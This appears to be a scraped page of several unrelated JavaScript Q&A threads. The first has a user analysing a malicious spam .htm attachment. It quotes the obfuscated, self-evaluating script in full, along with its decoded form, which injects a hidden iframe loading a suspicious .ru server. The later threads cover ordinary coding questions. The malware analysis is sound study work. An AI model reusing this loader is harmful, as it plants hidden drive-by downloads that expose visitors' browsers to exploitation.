I received a spam message that had a .htm attachment. I opened the file in gedit on my linux machine and saw the following. Does the script it would try to run do anything? It looks harmless, yet confusing.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait untill the page loads...</title>
</head>
<body>
<h1>Loading... Please Wait...</h1><br>
</body>`
<script>
if(window['doc'+'ume'+'nt'])
aa=/\w/.exec(new Date()).index+[];
aaa='0';
try {
new location();
}catch(qqq){
ss=String;
if(aa===aaa)
f='-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
.split('q');
md='a';
e=window['e'+'val'];
w=f;
s='';
fr='fromChar';
r=ss[fr+'Code'];
for(i=0;-i>-w.length;i+=1) {
j=i;
s=s+r(39+1*w[j]);
}
if(Math.round(-4*Math.tan(Math.atan(0.5)))===-2)
z=s;
e(z);
}
</script>
</html>
Encoded in f is the following code, which the script evals (executes):
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
I assume whatever lives on http://cparabnormapoopdsf.ru:8080 is evil and tries to exploit some kind of browser vulnerabilities.
I was able to extract f by basically copying what the script is doing:
var f = '-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
.split('q');
That gets you an array of numbers, which the script assembles into a string by adding 39 to each:
for (var i=0, s=''; i < f.length; i++) s+=String.fromCharCode(39+1*f[i]);
The encoded bit turns into:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php');
f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';
f.style.top='0';f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
The domain at http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php does something unknown. The server is running nginx and just redirects to google.com. Perhaps at some later point it will do something else.
Related
<html>
<head>
<script type="text/javascript">
function open_urls() {
var url1="https://finance.yahoo.com/";
var newpage=window.open(url1);
alert(newpage.document.body.innerText.split(' ').length);
}
</script>
</head>
<body onload="javascript: open_urls()"></body>
</html>
The code above did not work, how to access DOM for a different URL?
I'd like to open an URL and show the word count of that URL.
You can't simply open another window and page and expect to have access to it. The web follows many security policies to prevent operations like this, such as the Same-Origin policy. Long-story short, you can't access URLs that don't fall under the same-origin as the page you're calling from. You couldn't therefore access Yahoo finance in your example (most likely).
If you were calling from the same origin, you could use an API like fetch to get just the text and do a word count there, or you could even load an iframe and query that: myIframe.contentWindow.document.body.innerHTML.
So knowing that you cannot do this from the browser, you could do it from a NodeJS application (perhaps also using fetch):
var fetch = require('node-fetch');
fetch('https://finance.yahoo.com/')
.then(function(res) {
return res.text();
}).then(function(body) {
console.log(body);
// perform word-count here
});
I understand that you were hoping to do this from the browser, but unfortunately you will not be able to do so for origins that you do not control.
You can try this out.
In you index.html (suppose) write this:
<html>
<head>
<title>Index Page</title>
</head>
<script type="text/javascript">
function poponload()
{
testwindow = window.open("new_window.html", "mywindow","location=1,status=1,scrollbars=1,width=600,height=600");
}// here new_window.html is file you want to open or you can write any url there
</script>
<body onload="javascript: poponload()">
<h1>Hello this can Work</h1>
</body>
</html>
And suppose your new_window.html is like this:
<html>
<head>
<script>
function get_text(el) {
ret = "";
var length = el.childNodes.length;
for(var i = 0; i < length; i++) {
var node = el.childNodes[i];
if(node.nodeType != 8) {
ret += node.nodeType != 1 ? node.nodeValue : get_text(node);
}
}
return ret;
}
function run_this(){
var words = get_text(document.getElementById('content'));
var count = words.split(' ').length;
alert(count);
}
</script>
</head>
<body onload='javascript: run_this()' id="content">
<h1>This is the new window</h1>
</body>
</html>
I tried creating a simple JavaScript file based on my adaption of source code from MDN.
My JavaScript code (loughshore_clubs.js) is as follows
<!--
var Club = “Ballinderry” ;
function ClubType(name){
if (name == “Ardboe”){
return name ;
} else{
return “I'm not from “+ name + “.”;
}
}
var clubs {myClub: ClubType(“Ardboe”), club2: ClubType(Club),
club3:
ClubType(“Moortown”)}
console.log(clubs.myClub); //Ardboe
console.log(clubs.club2); //Ballinderry
console.log(clubs.club3); //Moortown
/-->
And the HTML source (test.html) is
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
charset=utf-8">
<title></title>
<meta name="generator" content="LibreOffice 4.2.4.2 (Linux)">
<meta name="created" content="20150514;0">
<meta name="changed" content="20150514;211357234273120">
<style type="text/css">
<!--
#page { margin: 2cm }
p { margin-bottom: 0.25cm; color: #000000; line-height:
120% }
a:link { so-language: en-US }
-->
</style>
</head>
<body>
<script src="scripts/loughshore_clubs.js" />
</body>
</html>
What's the matter? One thing I do realise is that I should avoid saving HTML files using LibreOffice and stick with Bluefish. (which I have on Mac o/s X Yosemite)
Remove the first and last lines of your script. HTML comment tags make no sense in a .js file.
Then replace each of your ” characters with a proper ".
You're also missing an = between clubs and { here: var clubs {myClub:...
After these changes you should have:
var Club = "Ballinderry";
function ClubType(name){
if (name == "Ardboe") {
return name;
} else {
return "I'm not from " + name + ".";
}
}
var clubs = {
myClub: ClubType("Ardboe"),
club2: ClubType(Club),
club3: ClubType("Moortown")
};
console.log(clubs.myClub); //Ardboe
console.log(clubs.club2); //Ballinderry
console.log(clubs.club3); //Moortown
This should work:
var Club = "Ballinderry" ;
function ClubType(name){
if (name == "Ardboe"){
return name ;
} else{
return "I\'m not from "+ name + ".";
}
}
var clubs = {
myClub: ClubType("Ardboe"),
club2: ClubType(Club),
club3: ClubType("Moortown")
};
console.log(clubs.myClub); //Ardboe
console.log(clubs.club2); //Ballinderry
console.log(clubs.club3); //Moortown
You're right, you should stop saving code with LibreOffice, because it changed all your " to “. I recommend using atom
And you didn't have an = when declaring the clubs variable.
Once again, get atom, and then download the linter package and use JShint. That should get you in the habit of writing nice code. I use it myself. Tweet to me if you need more help, I started out two months ago and I just completed the backend for my first Node.js app.
Edit: The other answer beat me to it, he should get the vote. :P
I have a very internationalised website, however I need to produce a pop-up specifically for our UK customers.
What I require is:
On page load: Is the user from the UK?
If yes then show div.
Else
Div remains hidden.
You can do this using freegeoip.
Since you mentioned that you want to use plain JavaScript (not jQuery), you should use JSONP to get the country:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset=utf-8>
<title>UK localisation</title>
</head>
<body>
<div id="myDiv" style="display:none">
<h1>Kittens</h1>
</div>
<script>
function toggleDiv(content) {
console.log(content.country_code);
if(content.country_code === 'GB') //Or GBR, or UK, I'm not sure.
{
document.getElementById('myDiv').style.display = "inline";
}
else
{
alert("You are not from UK, you are from " + content.country_code);
document.getElementById('myDiv').style.display = "none";
}
}
window.onload = function()
{
// create script element
var script = document.createElement('script');
// passing src with callback name
script.src = 'http://freegeoip.net/json/?callback=toggleDiv';
// insert script to document and load content
document.body.appendChild(script);
}
</script>
</body>
</html>
I've got a page with a splash screen, where users select one of two languages in which the rest of the site will be displayed. Next to each language option is a "remember my choice", HTML form, checkbox. How can I have the selected checkbox write a cookie with the language preference, which would skip the splash screen on future visits?
May be you can use something like below, Note code not tested:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">
function setCookie(c_name,value,expiredays) {
var exdate=new Date()
exdate.setDate(exdate.getDate()+expiredays)
document.cookie=c_name+ "=" +escape(value)+((expiredays==null) ? "" : ";expires="+exdate)
}
function getCookie(c_name) {
if (document.cookie.length>0) {
c_start=document.cookie.indexOf(c_name + "=")
if (c_start!=-1) {
c_start=c_start + c_name.length+1
c_end=document.cookie.indexOf(";",c_start)
if (c_end==-1) c_end=document.cookie.length
return unescape(document.cookie.substring(c_start,c_end))
}
}
return null
}
onload=function(){
document.getElementById('linksNewWindow').checked = getCookie('linksNewWindow')==1? true : false;
}
function set_check(){
setCookie('linksNewWindow', document.getElementById('linksNewWindow').checked? 1 : 0, 100);
}
</script>
</head>
<body>
<div>Hi</div>
<input type="checkbox" id="linksNewWindow" onchange="set_check();">
</body>
</html>
This is a great reference for javascript cookies, http://www.quirksmode.org/js/cookies.html, I suggest doing this with PHP other than javascript simply because I the cookies and session functions are much more powerful with server-side scripting.
document.cookie
^ this is the js code that represents a pages cookies.
First let me thank you for the assistance, I am new to Javascript, and want to learn to parse a >.xml file into my javascript. The file I want to parse is contact.xml, located in my root folder.
Again, thank you.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1 /DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">
function loadXMLDoc(XMLname)
{
var xmlDoc;
if (window.XMLHttpRequest)
{
xmlDoc=new window.XMLHttpRequest();
xmlDoc.open("GET",XMLname,false);
xmlDoc.send("");
return xmlDoc.responseXML;
}
// IE 5 and IE 6
else if (ActiveXObject("Microsoft.XMLDOM"))
{
xmlDoc=new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async=false;
xmlDoc.load(XMLname);
return xmlDoc;
}
alert("Error loading document!");
return null;
}
<title>Contacts</title>
</script>
</head>
<body>
<script type="text/javascript">
xmlDoc = loadXMLDoc("contactinfo.xml") // Path to the XML file;
var M = xmlDoc.getElementsByTagName("item");
for (i=0;i<M.length;i++){
document.write("<div style='width:450px;'>")
document.write("<h2>"+xmlDoc.getElementsByTagName("item")[i].childNodes[0].nodeValue+"</h2>");
document.write("<p>" + xmlDoc.getElementsByTagName("servicephone")[i].childNodes[0].nodeValue+ "</p>");
document.write("<p><a href='" + xmlDoc.getElementsByTagName("email")[i].childNodes[0].nodeValue +"</p>);
document.write("</div>")
}
</script>
</body>
</html>
*Here is my .xml file*
<?xml version="1.0" encoding="utf-8" ?>
<Contacts>
<item servicephone="(800) 500-0066"
email="customerservice#fsig.com"
url="http://www.fsig.com"
address="5000 Barcilona Beach Rd. Wilmington, NC 28000">
</item>
</Contacts>
You need to go down the hierarchy, so, first find the Contacts node, then inside there you can get all the tagnames as you have.
You have a great deal of attributes so you may find this useful also:
node.attributes["url"].nodeValue
So just loop through all the items, then I would just copy itemelem[t] to node just to make it easier, then you get the attributes you need.
Depending on the browser you are using most of them come with some javascript debugger, so you can put in breakpoints and look at the values in the variables and see what the next step needs to be.